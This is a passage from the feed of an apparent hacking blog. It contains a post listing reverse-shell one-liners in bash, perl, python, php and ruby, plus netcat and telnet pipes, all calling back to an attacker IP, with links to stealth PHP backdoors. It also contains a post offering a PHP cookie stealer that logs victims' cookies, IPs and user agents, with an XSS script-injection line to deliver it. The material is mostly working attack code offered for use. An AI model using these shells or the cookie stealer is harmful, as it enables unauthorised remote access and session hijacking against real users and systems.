border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;TARGET:telnet 127.0.0.1 8080 | /bin/bash | telnet 127.0.0.1 8888&lt;br /&gt;ATTACKER:nc -n -vv -l -p 8080&lt;br /&gt;ATTACKER2:nc -n -vv -l -p 8888&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;6.straight bash&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;bash -i &amp;gt;&amp;amp; /dev/tcp/10.0.0.1/8080 0&amp;gt;&amp;amp;1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;7.Inline perl&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&amp;gt;&amp;amp;S");open(STDOUT,"&amp;gt;&amp;amp;S");open(STDERR,"&amp;gt;&amp;amp;S");exec("/bin/sh -i");};'&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;8.Python&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec​t(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;9.php inline&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &amp;lt;&amp;amp;3 &amp;gt;&amp;amp;3 2&amp;gt;&amp;amp;3");'&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;10. Ruby&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &amp;lt;&amp;amp;%d &amp;gt;&amp;amp;%d 2&amp;gt;&amp;amp;%d",f,f,f)'&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;11.xterm (if available)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;xterm -display 10.0.0.1:1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Php-findsock-shell- designed to bypass egres filtering (fucking firewalls =]) -http://pentestmonkey.net/tools/web-shells/php-findsock-shell&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;Weevely- avoid bind shell/reverse shell via console over http - http://www.garage4hackers.com/f11/weevely-stealth-tiny-php-backdoor-1002.html&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;WeBaCoo- stealth^2 - http://packetstormsecurity.org/files/108009/webacoo-0.2.zip&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;But what if I still cant back-connect or nothing happens? - track down the server and take a fucking sledgehammer to it -_-!&lt;/span&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-3908591679702925817?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/3908591679702925817/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/having-trouble-back-connecting-here-ya.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/3908591679702925817'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/3908591679702925817'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/having-trouble-back-connecting-here-ya.html' title='Having trouble back-connecting? Here ya go!'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-6916935165320328764</id><published>2012-01-31T04:05:00.000+06:00</published><updated>2012-01-31T04:07:03.673+06:00</updated><title type='text'>Advanced cookie stealer with pagination</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: dodgerblue; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;I've worked lately on an cookie logger that makes it much easier browsing cookies and the way it logs it :)&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;"&gt;Image :&lt;/span&gt;&lt;br /&gt;&lt;img alt="[Image: picrh.png]" border="0" height="180" src="http://img18.imageshack.us/img18/1192/picrh.png" style="background-color: #333333; border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" width="400" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;"&gt;Installation steps :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: goldenrod; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;1 ) Logger&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: darkgreen; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;( logger.php )&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;PHP Code:&lt;/div&gt;&lt;div class="body"&gt;&lt;div dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: #66ccff;"&gt;&amp;lt;?php&lt;br /&gt;$cookie&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$HTTP_GET_VARS&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;[&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"cookie"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;];&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$date&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;date&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"j&amp;nbsp;F&amp;nbsp;Y&amp;nbsp;h:i:s&amp;nbsp;A"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$ip&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$_SERVER&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;[&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'REMOTE_ADDR'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;];&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$agent&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$_SERVER&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;[&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'HTTP_USER_AGENT'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;];&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$referer&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$_SERVER&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;[&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'HTTP_REFERER'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;];&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$file&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;fopen&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'logs.html'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'a'&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;fwrite&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$file&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;"&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;\n&amp;nbsp;&amp;lt;font&amp;nbsp;color='#990000'&amp;nbsp;&amp;gt;&amp;lt;b&amp;gt;\n&amp;nbsp;Cookies&amp;nbsp;:&amp;nbsp;&amp;lt;/b&amp;gt;&amp;lt;/font&amp;gt;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$cookie&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;&amp;nbsp;&amp;lt;br&amp;gt;\n&amp;lt;font&amp;nbsp;color='#990000'&amp;nbsp;&amp;gt;&amp;lt;b&amp;gt;&amp;nbsp;Date&amp;nbsp;:&amp;nbsp;&amp;lt;/b&amp;gt;&amp;lt;/font&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$date&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;&amp;nbsp;&amp;lt;br&amp;gt;\n&amp;nbsp;&amp;lt;font&amp;nbsp;color='#990000'&amp;nbsp;&amp;gt;&amp;lt;b&amp;gt;&amp;nbsp;IP&amp;nbsp;:&amp;nbsp;&amp;lt;/b&amp;gt;&amp;lt;/font&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$ip&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;&amp;nbsp;&amp;lt;br&amp;gt;\n&amp;lt;font&amp;nbsp;color='#990000'&amp;nbsp;&amp;gt;&amp;lt;b&amp;gt;\n&amp;nbsp;Referer&amp;nbsp;:&amp;nbsp;&amp;lt;/b&amp;gt;&amp;lt;/font&amp;gt;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$referer&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;&amp;nbsp;&amp;lt;br&amp;gt;\n&amp;lt;font&amp;nbsp;color='#990000'&amp;nbsp;&amp;gt;&amp;lt;b&amp;gt;&amp;nbsp;Agent&amp;nbsp;:&amp;nbsp;&amp;lt;/b&amp;gt;&amp;lt;/font&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$agent&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;&amp;nbsp;&amp;lt;br&amp;gt;\n&amp;lt;hr&amp;gt;&amp;lt;hr&amp;gt;&amp;lt;br&amp;gt;\n&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;\n"&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;fclose&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;$file&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;);&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;header&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;(&amp;nbsp;&lt;/span&gt;&lt;span style="color: #ff99ff;"&gt;'Location:&amp;nbsp;http://www.redirectURL.com'&amp;nbsp;&lt;/span&gt;&lt;span style="color: #7ac07c;"&gt;)&amp;nbsp;;&lt;/span&gt;&lt;span style="color: #66ccff;"&gt;?&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: goldenrod; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;2 ) JS logger&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: darkgreen; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;( logger.js )&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;This to insert it in your XSS directly through&lt;/span&gt;&lt;br /&gt;&lt;blockquote style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;cite style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; display: block; font-style: normal; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Quote:&lt;/cite&gt;&amp;lt;script src=http://www.yourwebsite.com/logger.js&amp;gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); 